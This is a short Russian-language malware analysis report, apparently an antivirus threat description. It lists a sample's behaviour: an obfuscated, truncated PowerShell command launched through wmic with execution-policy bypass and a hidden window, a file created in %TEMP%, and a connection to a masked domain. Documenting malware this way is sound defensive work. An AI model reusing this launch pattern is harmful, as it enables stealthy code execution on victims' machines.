Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\wbem\wmic.exe' "pRoCEss" 'calL' creAtE "PoWERSheLL -NOpr -noNinTERAcTIVe -exeCUTIonpOLic BYpASS $GAB =([CHaR]34).TOSTriNg() ;$PJ= ([CHAr]44).ToSTrIng() ;iex( "\"si vARIaBlE:frle ([tYPE](${GAB}{0}{3}{1}...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1116
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1092406.cvr
Сетевая активность
TCP
- 'ge###aga.com':443
UDP
- DNS ASK ge###aga.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wbem\wmic.exe' "pRoCEss" 'calL' creAtE "PoWERSheLL -NOpr -noNinTERAcTIVe -exeCUTIonpOLic BYpASS $GAB =([CHaR]34).TOSTriNg() ;$PJ= ([CHAr]44).ToSTrIng() ;iex( "\"si vARIaBlE:frle ([tYPE](${GAB}{0}{3}{1}...' (со скрытым окном)
